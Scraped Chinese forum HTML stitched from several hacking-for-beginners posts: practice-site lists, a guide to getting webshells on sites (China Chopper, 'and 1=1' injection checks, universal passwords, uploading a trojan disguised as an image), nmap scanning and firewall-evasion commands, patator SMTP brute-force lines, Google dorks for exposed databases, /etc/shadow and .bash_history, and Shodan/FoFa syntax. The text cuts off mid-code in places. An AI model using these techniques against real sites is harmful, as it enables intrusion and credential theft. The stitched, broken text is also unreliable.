href=&/?target=https%3A///SpiderLabs/SQLol& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&SpiderLabs/SQLol&i class=&icon-external&&&/i&&/a&&br&&/p&&p&更多的工具的平台 发在微博,知乎检测了,&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Sina Visitor System&i class=&icon-external&&&/i&&/a&&br&&/p&&br&&p&&strong&OverTheWire&/strong&基于游戏的让你学习安全技术和概念的黑客网站&/p&&p&Peruggia,一个提供安全、合法攻击的黑客网站&/p&&p&&strong&Root Me &/strong&通过超过200名黑客的挑战和50个虚拟环境来提高你黑客技巧和网络安全知识的网站&/p&&p&&strong&Try2Hack &/strong&最古老的黑客网站之一,提供多种安全挑战。&/p&&p&&strong&Vicnum &/strong&基于游戏的方式来引导安全开发者学习安全技术。&/p&&p&WebGoat 提供了一个真实的安全教学环境,指导用户设计复杂的应用程序安全问题&/p&&p&装逼的那些并不能在妹子面前耍帅 (那些工具只能纯属娱乐) 。只有通过真本事赢得妹子、赢得钱钱 (职场) 、赢得未来、真本事哪里来?&/p&&p&学习黑客的第一本书 工具书 系列入门学习 《&a href=&/?target=https%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&网络黑白&i class=&icon-external&&&/i&&/a&》&br&&/p&&p&每个章节都会有知识点,提到了几个关键字,渗透、入侵、社会工程学、蜜罐、内网渗透、外网渗透,白帽子,黑帽子等等。入侵渗透涉及许多知识和技术,需要前期的很多准备,请一定看完文字部分往下翻,网络安全极其重要,尤其是近两年,在早些时候,网络的防御几乎如纸窗一般,那时候大批的脚本小子也趁虚而入,许多数据都被盗取,而这时白帽子一词便也问世。同理的利用同样技术的另一对面的便是黑帽,在我看来并没有所谓的好坏一分,如果黑客与骇客一般,只看你自己如何理解,也不要给自己贴上所谓的标签。&br&&/p&&p&看到部分文章没有阅读到的可以翻一下我的微博文章、知乎专栏、微信公众号、黑客花无涯,都可以的,想进一步了解学习可以看看我的书 ,很多人有私信一直来问,这里就贴出来前几章的链接,方便查阅。感谢大家提出的建议,我的网盘也有小白&a href=&/?target=http%3A///share/home%3Fuk%3Dview%3Dshare%23category/type%3D0& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&入门教程&i class=&icon-external&&&/i&&/a&,零基础网盘 &a href=&/?target=http%3A///share/home%3Fuk%3Dview%3Dshare%23category/type%3D0& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&百度网盘-19****394的分享&i class=&icon-external&&&/i&&/a&。&/p&&p&自己的价值观是怎么样的,拿技术去做一些什么样的事情,成为什么样的人,愿望和初心是好的,做点有意义的事情,利用工具和平台是很方便,但是要养成思维和各种熟练的操作,而不是对什么都不懂,就靠着工具里头的功能。&/p&&p&“这就好比一个人学会了武功,在没有打人之前,你不能说他是个坏人。如果他用来除暴安良,他就是侠,如果他用来打家劫舍,那他就是盗。”每章结尾有彩蛋,it从业者和小白如何保护自己的招数。好了,话不多说,新手渗透必须学的就是先会安装这个平台,很多人虚拟机都还不会安装,先把虚拟机安装好,该学的自己都要去实践,去操作。&/p&&p&现实世界的每一个个人和组织,都在网络世界的版图中对应着属于自己的一座或大或小的城池。而在险恶的互联网丛林中,每座城市都随时面临来自黑暗中的突施冷箭,来跟我一起走进黑客世界。 &br&&/p&&p&网络世界比真实世界更浩淼,更繁复。正义的光芒难以照射这个空间的一切折痕沟回。更多的时候,这像一个黑暗的森林,我们需要用武器来武装自己,对抗黑暗中侵袭而来的枪弹。网络世界如何保护自己和身边的人? 跟我一起走进黑客世界 。&/p&&p&诚然,很多人想到黑客,就会联想到高超的技术。但是,当你真正了解到赛博世界殊死搏斗的真相,你就会理解,对于黑客的最高褒赏,并不是攻城略地的高超技术,而是不战而屈人之兵的闪光智慧。&/p&&p&我发现,无论任何人,只要找到好方向,找到对的人,做一个精心的布局,遇到一个不错的机会,玩命干起来,那么只要三年,或许只要两年,就足以改变一个人的大命运。比如从草根到行业大牛,从小创业者,到行业里的教父级人物。不存在什么十年打拼之类的, 黑客亦是如此,共勉。&/p&&p&中国黑客协会信息安全组织启用“H.A.C”,为组织全体成员代号。中国黑客协会是一种精神的传承,黑客代表是一种精神,它是一种热爱祖国、坚持正义、开拓进取的精神,不断的吸收与发展,中国黑客协会目前是世界范围内延续发展最久远的黑客组织之一。&br&&/p&&p&我们认为真正的民族主义者以追求本民族――中华民族的利益最大化为目标、准则、信念。判断一个人是不是真正的民族主义者,判断标准很简单:看他是给本民族的整体利益带来好处,还是损害民族利益。真正的民族主义者最务实,因为他知道坚持原则,同时又懂得策略。&/p&&p&感谢大家打赏给我动力更新下去!!!大家可以多给些建议和想法!&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客之 小白入门 第一弹&i class=&icon-external&&&/i&&/a&| &a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界 2 学习渗透技术&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界3 白帽和黑帽&i class=&icon-external&&&/i&&/a&| &a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界4 脚本小子&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界5 黑客历程&i class=&icon-external&&&/i&&/a& | &a href=&/heike& class=&internal&&黑客花无涯知乎专栏&/a&&br&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界6 漏洞扫描 &i class=&icon-external&&&/i&&/a&|&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界7 Dos命令&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界9 远控肉鸡&i class=&icon-external&&&/i&&/a&|&a href=&/p/& class=&internal&&花无涯带你走进黑客世界9远控肉鸡(番外篇)&/a&&/p&&p&&a href=&/p/& class=&internal&&2017黑客新手工具系列集合附链接&/a&&/p&
直接推荐,因为有比较多,我也没办法把所有的都分享出来,大家可以在评论,私信,完善起来,分享才能进步。进攻即是最好的防御,这句话同样适用于信息安全的世界。合法的来练习黑客技术的网站,不管你是一名开发人员、安全工程师、代码审计师、渗透 测试人…
&img src=&/50/v2-d4b7c6f612c91cc439a6d_b.jpg& data-rawwidth=&1080& data-rawheight=&1080& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&/50/v2-d4b7c6f612c91cc439a6d_r.jpg&&零基础网盘 &a href=&/?target=http%3A///share/home%3Fuk%3Dview%3Dshare%23category/type%3D0& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&百度网盘-19****394的分享&i class=&icon-external&&&/i&&/a&&br&&p&新手入门过程 看完 后面有进阶过程&/p&&p&简单工具&/p&&p&注:工具网盘黑协纪念优盘有&/p&&p&1. 啊 D &/p&&p&2. 明小子&/p&&p&webshell&/p&&p&工具推荐: 中国菜刀&/p&&p&拿shell常用格式.asp.asa.csx.cer&/p&&p&手工判断是否可注入&/p&&p&url后添加 (1)and 1=1 (2)and 1=2&/p&&p&工具推荐:vstart&/p&&p&万能密码进站(老站)&/p&&p&常用万能密码&/p&&p&旁注(从旁注入)&/p&&p&百度 “同ip网站查询”&/p&&p&图片上传拿shell&/p&&p&在文件上传点,假装上传图片,实际上传大马,访问即可&/p&&p&手工爆账号密码&/p&&p&ip随意换&/p&&p&推荐工具:花刺代理&/p&&br&&p&每个章节都会有知识点,提到了几个关键字,渗透、入侵、社会工程学、蜜罐、内网渗透、外网渗透,白帽子,黑帽子等等。入侵渗透涉及许多知识和技术,需要前期的很多准备,请一定看完文字部分往下翻,网络安全极其重要,尤其是近两年,在早些时候,网络的防御几乎如纸窗一般,那时候大批的脚本小子也趁虚而入,许多数据都被盗取,而这时白帽子一词便也问世。同理的利用同样技术的另一对面的便是黑帽,在我看来并没有所谓的好坏一分,如果黑客与骇客一般,只看你自己如何理解,也不要给自己贴上所谓的标签。&br&&/p&&br&&p&看到部分文章没有阅读到的可以翻一下我的微博文章、知乎专栏、微信公众号、黑客花无涯,都可以的,想进一步了解学习可以看看我的第一本书 网络黑白 ,很多人有私信一直来问,这里就贴出来前几章的链接,方便查阅。感谢大家提出的建议。&/p&&br&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客之 小白入门 第一弹&i class=&icon-external&&&/i&&/a&| &a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界 2 学习渗透技术&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界3 白帽和黑帽&i class=&icon-external&&&/i&&/a&|
&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界4 脚本小子&i class=&icon-external&&&/i&&/a&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D%26mod%3Dzwenzhang& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界5 黑客历程&i class=&icon-external&&&/i&&/a& | &a href=&/heike& class=&internal&&黑客花无涯知乎专栏&/a&&br&&/p&&p&&a href=&/?target=http%3A///ttarticle/p/show%3Fid%3D& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&花无涯带你走进黑客世界6 漏洞扫描 &i class=&icon-external&&&/i&&/a&&br&&/p&&p&讲了脚本小子,虽然这些对于真正的黑客来说是必须具备的素质。但是需要看自己怎么理解,自己的价值观是怎么样的,拿技术去做一些什么样的事情,成为什么样的人,愿望和初心是好的,做点有意义的事情,利用工具和平台是很方便,但是要养成思维和各种熟练的操作,而不是对什么都不懂,就靠着工具里头的功能。&/p&&br&&p&“这就好比一个人学会了武功,在没有打人之前,你不能说他是个坏人。如果他用来除暴安良,他就是侠,如果他用来打家劫舍,那他就是盗。”每章结尾有彩蛋,it从业者和小白如何保护自己的招数。好了,话不多说,新手渗透必须学的就是先会安装这个平台,很多人虚拟机都还不会安装,先把虚拟机安装好,然后在安装这个。&/p&&br&&h3&最好的 NMAP 扫描策略&/h3&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# 适用所有大小网络最好的 nmap 扫描策略
# 主机发现,生成存活主机列表
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
$ grep &Status: Up& Discovery.gnmap | cut -f 2 -d ' ' & LiveHosts.txt
# 端口发现,发现大部分常用端口
# http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf
$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt
# 端口发现,发现全部端口,但 UDP 端口的扫描会非常慢
$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt
# 显示 TCP\UDP 端口
$ grep &open& FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print &T:&$0}'
$ grep &open& FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print &U:&$0}'
# 侦测服务版本
$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
# 扫做系统扫描
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
# 系统和服务检测
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt
&/code&&/pre&&/div&&h3&Nmap – 躲避防火墙&/h3&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# 分段
# 修改默认 MTU 大小,但必须为 8 的倍数(8,16,24,32 等等)
$ nmap --mtu 24
# 生成随机数量的欺骗
$ nmap -D RND:10 [target]
# 手动指定欺骗使用的 IP
$ nmap -D decoy1,decoy2,decoy3 etc.
# 僵尸网络扫描, 首先需要找到僵尸网络的IP
$ nmap -sI [Zombie IP] [Target IP]
# 指定源端口号
$ nmap --source-port 80 IP
# 在每个扫描数据包后追加随机数量的数据
$ nmap --data-length 25 IP
# MAC 地址欺骗,可以生成不同主机的 MAC 地址
$ nmap --spoof-mac Dell/Apple/3Com IP
&/code&&/pre&&/div&&h3&Nmap 进行 Web 漏洞扫描&/h3&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&cd /usr/share/nmap/scripts/
wget putec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV --script=vulscan/vulscan.nse target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV --script=vuln target
nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target
&/code&&/pre&&/div&&h3&使用 DIRB 爆破目录&/h3&&p&注:&a href=&/?target=http%3A//dirb.sourceforge.net/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&DIRB&i class=&icon-external&&&/i&&/a& 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的&a href=&/?target=https%3A///lanjelot/patator& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&patator&i class=&icon-external&&&/i&&/a&,&a href=&/?target=https%3A///maurosoria/dirsearch& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&dirsearch&i class=&icon-external&&&/i&&/a&,&a href=&/?target=https%3A//www.owasp.org/index.php/Category%3AOWASP_DirBuster_Project& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&DirBuster&i class=&icon-external&&&/i&&/a&, 国内的御剑等等。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
&/code&&/pre&&/div&&h3&Patator – 全能暴力破解测试工具&/h3&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# git clone /lanjelot/patator.git /usr/share/patator
# SMTP 爆破
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
&/code&&/pre&&/div&&h3&使用 Fierce 爆破 DNS&/h3&&p&注:Fierce 会检查 DNS 服务器是否允许区域传送。如果允许,就会进行区域传送并通知用户,如果不允许,则可以通过查询 DNS 服务器枚举主机名。类似工具:&a href=&/?target=https%3A///lijiejie/subDomainsBrute& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&subDomainsBr}
&/code&&/pre&&/div&&h4&&strong&利用google暴库&/strong&&/h4&&br&&p&利用goole可以搜索到互联网上可以直接下载到的数据库文件,语法如下:&/p&&br&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&inurl:editor/db/inurl:eWebEditor/db/inurl:bbs/data/inurl:databackup/inurl:blog/data/inurl:\boke\datainurl:bbs/database/inurl:conn.aspinc/conn.aspServer.mapPath(“.mdb”)allinurl:bbs datafiletype:mdb inurl:databasefiletype:inc conninurl:data filetype:mdbintitle:&index of& data
&/code&&/pre&&/div&&h4&&strong&利用goole搜索敏感信息&/strong&&/h4&&br&&p&利用google可以搜索一些网站的敏感信息,语法如下:&/p&&br&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&intitle:&index of& etcintitle:&Index of& .sh_historyintitle:&Index of& .bash_historyintitle:&index of& passwdintitle:&index of& people.lstintitle:&index of& pwd.dbintitle:&index of& etc/shadowintitle:&index of& spwdintitle:&index of& master.passwdintitle:&index of& htpasswdinurl:service.pwd
&/code&&/pre&&/div&&h4&利用google搜索C段服务器信息&/h4&&br&&p&此技巧来自lostwolf&/p&&br&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&site:218.87.21.*
&/code&&/pre&&/div&&p&可通过google可获取218.87.21.0/24网络的服务信息。&/p&&br&&h3&shodan搜索引擎&/h3&&br&&p&shodan网络搜索引擎偏向网络设备以及服务器的搜索,具体内容可上网查阅,这里给出它的高级搜索语法。&/p&&p&&br&地址:&a href=&/?target=https%3A//www.shodan.io/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Shodan&i class=&icon-external&&&/i&&/a&&/p&&br&&h4&&strong&搜索语法&/strong&&/h4&&br&&ul&&li&&p&hostname: 搜索指定的主机或域名,例如 hostname:”google”&/p&&/li&&li&&p&port: 搜索指定的端口或服务,例如 port:”21”&/p&&/li&&li&&p&country: 搜索指定的国家,例如 country:”CN”&/p&&/li&&li&&p&city: 搜索指定的城市,例如 city:”Hefei”&/p&&/li&&li&&p&org: 搜索指定的组织或公司,例如 org:”google”&/p&&/li&&li&&p&isp: 搜索指定的ISP供应商,例如 isp:”China Telecom”&/p&&/li&&li&&p&product: 搜索指定的操作系统/软件/平台,例如 product:”Apache httpd”&/p&&/li&&li&&p&version: 搜索指定的软件版本,例如 version:”1.6.2”&/p&&/li&&li&&p&geo: 搜索指定的地理位置,例如 geo:”31.08”&/p&&/li&&li&&p&before/after: 搜索指定收录时间前后的数据,格式为dd-mm-yy,例如 before:”11-11-15”&/p&&/li&&li&&p&net: 搜索指定的IP地址或子网,例如 net:”210.45.240.0/24”&/p&&/li&&/ul&&p&以上内容参考:&a href=&/?target=http%3A//xiaix.me/shodan-xin-shou-ru-keng-zhi-nan/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&xiaix's Blog&i class=&icon-external&&&/i&&/a&&/p&&br&&h3&&strong&censys搜索引擎&/strong&&/h3&&br&&p&censys搜索引擎功能与shodan类似,以下几个文档信息。&/p&&p&&br&地址:&a href=&/?target=https%3A//www.censys.io/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Censys&i class=&icon-external&&&/i&&/a&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&https://www.censys.io/certificates/help 帮助文档https://www.censys.io/ipv4?q=
ip查询https://www.censys.io/domain?q=
域名查询https://www.censys.io/certificates?q= 证书查询
&/code&&/pre&&/div&&h4&&strong&搜索语法&/strong&&/h4&&br&&p&默认情况下censys支持全文检索。&/p&&br&&ul&&li&&p&23.0.0.0/8 or 8.8.8.0/24 可以使用and or not&/p&&/li&&li&&p&80.http.get.status_code: 200 指定状态&/p&&/li&&li&&p&80.http.get.status_code:[200 TO 300] 200-300之间的状态码&/p&&/li&&li&&p&location.country_code: DE 国家&/p&&/li&&li&&p&protocols: (“23/telnet” or “21/ftp”) 协议&/p&&/li&&li&&p&tags: scada 标签&/p&&/li&&li&&p&80.http.get.headers.server:nginx 服务器类型版本&/p&&/li&&li&&p&autonomous_system.description: University 系统描述&/p&&/li&&li&&p&正则&/p&&br&&/li&&/ul&&h3&&strong&钟馗之眼&/strong&&/h3&&br&&p&钟馗之眼搜索引擎偏向web应用层面的搜索。&/p&&p&地址:&a href=&/?target=https%3A//www.zoomeye.org/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://www.&/span&&span class=&visible&&zoomeye.org/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&/p&&br&&h4&&strong&搜索语法&/strong&&/h4&&br&&ul&&li&&p&app:nginx 组件名&/p&&/li&&li&&p&ver:1.0 版本&/p&&/li&&li&&p&os:windows 操作系统&/p&&/li&&li&&p&country:”China” 国家&/p&&/li&&li&&p&city:”hangzhou” 城市&/p&&/li&&li&&p&port:80 端口&/p&&/li&&li&&p&hostname:google 主机名&/p&&/li&&li&&p&site:thief.one 网站域名&/p&&/li&&li&&p&desc:nmask 描述&/p&&/li&&li&&p&keywords:nmask’blog 关键词&/p&&/li&&li&&p&service:ftp 服务类型&/p&&/li&&li&&p&ip:8.8.8.8 ip地址&/p&&/li&&li&&p&cidr:8.8.8.8/24 ip地址段&/p&&br&&/li&&/ul&&h3&&strong&FoFa搜索引擎&/strong&&/h3&&br&&p&FoFa搜索引擎偏向资产搜索。&/p&&p&地址:&a href=&/?target=https%3A//fofa.so& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&FOFA Pro - 网络空间安全搜索引擎,网络空间搜索引擎,网络空间测绘,安全态势感知&i class=&icon-external&&&/i&&/a&&/p&&br&&h4&&strong&搜索语法&/strong&&/h4&&br&&ul&&li&&p&title=”abc” 从标题中搜索abc。例:标题中有北京的网站。&/p&&/li&&li&&p&header=”abc” 从http头中搜索abc。例:jboss服务器。&/p&&/li&&li&&p&body=”abc” 从html正文中搜索abc。例:正文包含Hacked by。&/p&&/li&&li&&p&domain=”qq.com” 搜索根域名带有&a href=&/?target=http%3A//qq.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&的网站。例: 根域名是&a href=&/?target=http%3A//qq.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&的网站。&/p&&/li&&li&&p&host=”.” 从url中搜索.,注意搜索要用host作为名称。&/p&&/li&&li&&p&port=”443” 查找对应443端口的资产。例: 查找对应443端口的资产。&/p&&/li&&li&&p&ip=”1.1.1.1” 从ip中搜索包含1.1.1.1的网站,注意搜索要用ip作为名称。&/p&&/li&&li&&p&protocol=”https” 搜索制定协议类型(在开启端口扫描的情况下有效)。例: 查询https协议资产。&/p&&/li&&li&&p&city=”Beijing” 搜索指定城市的资产。例: 搜索指定城市的资产。&/p&&/li&&li&&p®ion=”Zhejiang” 搜索指定行政区的资产。例: 搜索指定行政区的资产。&/p&&/li&&li&&p&country=”CN” 搜索指定国家(编码)的资产。例: 搜索指定国家(编码)的资产。&/p&&/li&&li&&p&cert=”” 搜索证书(https或者imaps等)中带有&a href=&/?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&的资产。&/p&&br&&/li&&/ul&&p&&strong&高级搜索:&/strong&&/p&&br&&ul&&li&&p&title=”powered by” && title!=discuz&/p&&/li&&li&&p&title!=”powered by” && body=discuz&/p&&/li&&li&&p&( body=”content=\”WordPress” || (header=”X-Pingback” && header=”/xmlrpc.php” && body=”/wp-includes/“) ) && host=””&/p&&br&&/li&&/ul&&h3&&strong&Dnsdb搜索引擎&/strong&&/h3&&br&&p&dnsdb搜索引擎是一款针对dbs解析的查询平台。&/p&&p&地址:&a href=&/?target=https%3A//www.dnsdb.io/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&DnsDB&i class=&icon-external&&&/i&&/a&&/p&&br&&h4&&strong&搜索语法&/strong&&/h4&&br&&p&DnsDB查询语法结构为条件1 条件2 条件3 …., 每个条件以空格间隔, DnsDB 会&/p&&p&把满足所有查询条件的结果返回给用户.&/p&&br&&strong&域名查询条件&/strong&&br&&p&域名查询是指查询顶级私有域名所有的DNS记录, 查询语法为domain:.&/p&&p&例如查询&a href=&/?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& 的所有DNS记录: .&/p&&p&域名查询可以省略domain:.&/p&&br&&strong&主机查询条件&/strong&&br&&p&查询语法:host:&/p&&p&&br&例如查询主机地址为的DNS记录: host:&/p&&p&主机查询条件与域名查询查询条件的区别在于, 主机查询匹配的是DNS记录的&/p&&p&Host值&br&&/p&&br&&strong&按DNS记录类型查询&/strong&&br&&p&查询语法: type:.&br&例如只查询A记录: type:a&br&使用条件:必须存在domain:或者host:条件,才可以使用type:查询语法&/p&&br&&strong&按IP限制&/strong&&br&&p&查询语法: ip:&br&查询指定IP: ip:8.8.8.8, 该查询与直接输入8.8.8.8进行查询等效&br&查询指定IP范围: ip:8.8.8.8-8.8.255.255&br&CIDR: ip:8.8.0.0/24&br&IP最大范围限制65536个&/p&&br&&strong&条件组合查询的例子&/strong&&br&&p&查询&a href=&/?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&的所有A记录: &a href=&/?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& type:a&/p&&p&本文将会持续补充一些内容……&/p&&br&&p&From:&a href=&/?target=http%3A//thief.one//1/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&【渗透神器系列】搜索引擎&i class=&icon-external&&&/i&&/a&&/p&
搜索引擎是我日常工作中用得最多的一款工具,国内常用的搜索引擎包括Baidu,sougou,bing等。但我本篇要纪录的并不是这些常用的搜索引擎,而是信息安全从业人员必备的几款网络搜索引擎。本篇要介绍的搜索引擎包括:Shodan,censys,钟馗之眼,Google,FoFa…
&p&前段时间,老师在群里分享了一个 github 的连接,说开源了。&/p&&p&我记得当时,看了看,才那么 几 百 M ,,,还 8.8 W
= = !&/p&&p&昨天,我一朋友自己直接搭自己硬盘上了,我就自己搭搭吧,很简单的,一放一点就成了。&/p&&p&&b&# &/b&按我的风格,肯定要记录的详细的不能再详细了 ,就算很简单的步骤,我也要详细点。&/p&&p&&b&#&/b& 就像,我上次用 linux 的系统,搭建一个网站,要是有大牛直接甩我 一堆命令行 ,该有多好,我直接张贴复制就是怼。 #(斜眼笑。。。)&/p&&p&&b&# 晚,我百度网盘里存的图片,真的存在一句话!0.0屌啊!我再开一个帖子,写写把。。。&/b&&/p&&p&&b&这个是关于两个图片马的帖子。 &br&&/b&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&/p/
&/code&&/pre&&/div&&p&这个是开源地址: &br&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&/m0l1ce/wooyunallbugs
&/code&&/pre&&/div&&p&这是我存我百度盘里的:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&链接: /s/1nvkFKox 密码: 94sp
&/code&&/pre&&/div&&p&----------------------------------------------------------------------------------------------------------------&/p&&p&1,首先去下载一个集成环境工具,这里我用的 phpStudy , 33M 的这个。&/p&&p&&img src=&/v2-8a82ab7b027f1f259fb05_b.jpg& data-rawwidth=&679& data-rawheight=&135& class=&origin_image zh-lightbox-thumb& width=&679& data-original=&/v2-8a82ab7b027f1f259fb05_r.jpg&&下载地址:&a href=&/?target=http%3A//www.phpstudy.net/a.php/211.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&phpStudy
再次更新,支持自定义php版本&i class=&icon-external&&&/i&&/a&&br&&/p&&p&2,然后,我解压到我的 D 盘上了。&/p&&p&&img src=&/v2-3ca4b3d1be_b.jpg& data-rawwidth=&798& data-rawheight=&623& class=&origin_image zh-lightbox-thumb& width=&798& data-original=&/v2-3ca4b3d1be_r.jpg&&3,把源码和数据库先下载开,图片用的是外连,人家也说了,放图片的服务器不会关掉的。&/p&&p&&img src=&/v2-ce1dd65ced704cc9d3ed4b_b.jpg& data-rawwidth=&1098& data-rawheight=&286& class=&origin_image zh-lightbox-thumb& width=&1098& data-original=&/v2-ce1dd65ced704cc9d3ed4b_r.jpg&&4,把 bugs.rar 这个源码包解压到了 D:\phpStudy\WWW\bugs\
